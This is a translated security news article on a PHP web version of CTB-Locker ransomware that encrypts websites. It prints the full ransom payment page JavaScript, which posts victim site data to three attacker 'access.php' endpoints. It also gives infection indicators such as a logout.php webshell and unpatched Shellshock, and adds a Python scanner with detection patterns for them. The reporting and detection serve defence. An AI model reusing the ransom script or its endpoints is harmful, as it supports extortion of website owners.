The source code of a web-based version of the CTB-Locker ransomware has appeared on GitHub. CTB-Locker has evolved into a web version that can infect websites; according to analysis, the code is written in PHP, and the source code has been hosted on GitHub.
The first appearance of CTB-Locker
On the eve of Valentine's Day in the West this year, a British webmaster found that a website he managed had been tampered with. The information displayed on the tampered page looked similar to what a computer infected with ransomware displays: its main message asked the site administrator to pay Bitcoin in exchange for decryption of the files in the corresponding directory, so as to restore the site to normal. Tampered pages looked like this:
After it was verified as the first extortion incident targeting web pages, the incident received great attention. In fact, as a server administrator, one could at first only hope that this was a one-off event rather than the start of a premeditated attacker campaign.
In the initial phase, no other infection events were detected, but the situation changed significantly over the following week. During this period, the same kind of website ransomware incident occurred frequently; reportedly, more than 100 incidents of the same type were detected. In the tampered page, the operator behind it asked the victim to pay 0.4 Bitcoin; if payment was not completed within two days, the amount would be increased to 0.8. The script behind the Bitcoin payment page is as follows:
<script>
// Three attacker-controlled "admin" endpoints the page talks to; the page
// rotates to the next one when a request fails.
admins = ["http://orangecountyplasterandstucco.com/access.php", "http://klinika-redwhite.com/access.php", "http://charoenpan.com/access.php"];
iadmin = 0;
// Host name of the infected site, sent along with every request.
domain = encodeURIComponent(window.location.href.replace('http://', '').replace('https://', '').split('/')[0]);

// POST to the current admin endpoint (requires jQuery); on failure, move on to the next one.
function post_admin(postdata, onsuccess) {
    $.post(admins[iadmin], postdata + "&domain=" + domain, function (data) {
        if (data["status"] == "success") {
            onsuccess(data);
        } else {
            alert(data["status"]);
        }
    }, 'json').fail(function () {
        alert(iadmin >= 2 ? 'It seems like our server is down=( Try to push it again' : 'Push it again');
        iadmin = (iadmin + 1) % 3;
    });
}

// "Decrypt" button: fetch the key, then reload the page with it in the query string.
$('#decrypt').click(function () {
    post_admin("decrypt=", function (data) {
        alert('Your decryption key is ' + data["decrypt"] + '! Wait while page will be updated!');
        var url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
        window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];
    });
});

// "Test decryption" button: a free test key tied to the victim's secret.
$('#dectest').click(function () {
    post_admin("dectest=&secret=" + ($("#secret").val()), function (data) {
        alert('Your test decryption key is ' + data["dectest"] + '! Wait while page will be updated!');
        var url = window.location.href + (window.location.href.indexOf('?') !== -1 ? '&' : '?');
        window.location.href = url + 'dectest=' + data["dectest"] + '&secret=' + data["secret"];
    });
});

// Built-in "chat" with the operator, sent and received through the same endpoint.
$('#sendmsg').click(function () {
    var msg = "&msg=" + encodeURIComponent($("#chatmsg").val());
    post_admin("sendmsg=&secret=" + $("#secret").val() + msg, function (data) {
        alert('Thank you for feedback!');
    });
});
$('#recvmsg').click(function () {
    post_admin("recvmsg=&secret=" + $("#secret").val(), function (data) {
        $("#chatmsg").val(data["answer"]);
    });
});
</script>
In its ransom payment notice, this ransomware follows the same model as CTB-Locker. Technically, however, this is inconsistent with the widely known CTB-Locker ransomware, because that one only runs in a Windows desktop environment and cannot run on a Linux web server.
The Web version of CTB-Locker is written in PHP
Benkow, a security analyst from Stormshield, analyzed how the ransomware runs and extracted its source code from an infected object. Benkow then uploaded the source code of the web version of CTB-Locker to the KernelMode forum for analysis and research by other security researchers. The "popularity" of the web version of CTB-Locker grew rapidly, and its source code is also hosted on GitHub.
The source code is available on GitHub.
Consider that the source code of the Hidden Tear ransomware was previously hosted on GitHub, and things did not turn out in users' favor. Combined with the current situation, we can predict that in the next few months there may be a large number of attacks infecting websites.
According to Benkow's research and analysis, the web version of CTB-Locker is written in PHP and uses the strong AES-256 encryption algorithm. For details, refer to the source code on GitHub.
The infection vector is still unknown
It is not yet known how this ransomware infects the server host. It is worth noting that, according to statistics, most (73%) of the infected hosts run the Exim service (an SMTP server), on both Linux and Windows systems. Benkow also added that
Most hosts run a webshell, which can be accessed through the 'logout.php' dynamic page.
In addition, many infected sites were found to still have the Shellshock vulnerability, which was disclosed more than a year ago. According to statistics, the major problem is that most websites ignore their own vulnerabilities and fail to fix them; as a result, these vulnerabilities may be exploited by attackers.
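As an added defender's example (not from the article or from the leaked source), the following Python script scans a web root for the indicators the article itself mentions: the payment page's script (the admin list pointing at access.php, the post_admin helper and the decrypt=/dectest= parameters) and the 'logout.php' file name Benkow associates with the webshell. The sample web root is constructed inline; the host example.invalid and the indicator labels are my own assumptions.

```python
import os
import re
import tempfile

# Indicators taken from the article's payment script and Benkow's note on the
# webshell file name; the label names are assumptions made for this example.
PAGE_INDICATORS = {
    "ctb_admin_list": re.compile(r"admins\s*=\s*\[[^\]]*access\.php", re.S),
    "ctb_post_admin": re.compile(r"function\s+post_admin\s*\("),
    "ctb_decrypt_params": re.compile(r"['\"](?:decrypt|dectest)="),
}
SUSPECT_FILENAMES = {"logout.php"}

def scan_file(path):
    """Return the indicator names matched by one file (empty list if clean)."""
    hits = []
    if os.path.basename(path) in SUSPECT_FILENAMES:
        hits.append("webshell_filename")
    try:
        with open(path, encoding="utf-8", errors="replace") as f:
            text = f.read()
    except OSError:
        return hits  # unreadable file: report the name-based hit only
    for label, pattern in PAGE_INDICATORS.items():
        if pattern.search(text):
            hits.append(label)
    return hits

def scan_webroot(root):
    """Walk a web root; return {relative_path: [indicators]} for files with hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            if hits := scan_file(full):
                findings[os.path.relpath(full, root)] = hits
    return findings

def demo():
    """Constructed sample web root: a tampered index page, a webshell-named file, a clean page."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "blog"))
    with open(os.path.join(root, "index.html"), "w") as f:  # mimics the ransom page
        f.write('<script>admins = ["http://example.invalid/access.php"];'
                'function post_admin(postdata, onsuccess) {}'
                "$('#dectest').click(function() { post_admin(\"dectest=&secret=\"); });</script>")
    with open(os.path.join(root, "blog", "logout.php"), "w") as f:  # name-only indicator
        f.write("<?php /* constructed placeholder, not a real webshell */ ?>")
    with open(os.path.join(root, "blog", "about.html"), "w") as f:
        f.write("<html><body>Hello</body></html>")
    return scan_webroot(root)
```

Calling demo() returns the findings for the constructed tree; point scan_webroot() at a real document root to use it on a suspect host.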
Ransomware that previously infected web servers
In February, security researchers discovered that the Linux.Encoder ransomware family already had functionality targeting web servers. According to research and analysis, Linux.Encoder is written in C and C++, but it is not associated with the web version of CTB-Locker.
Conclusion
Given the increasingly severe security situation, site administrators should update their sites to the latest version. Where possible, several scanning tools should be used to cross-check managed sites for vulnerabilities, so that vulnerabilities are promptly discovered, fixed, and hardened against.
* Reference sources: soft, github, ker, and FB editor troy. For more information, see FreeBuf hacker and geek (FreeBuf.COM)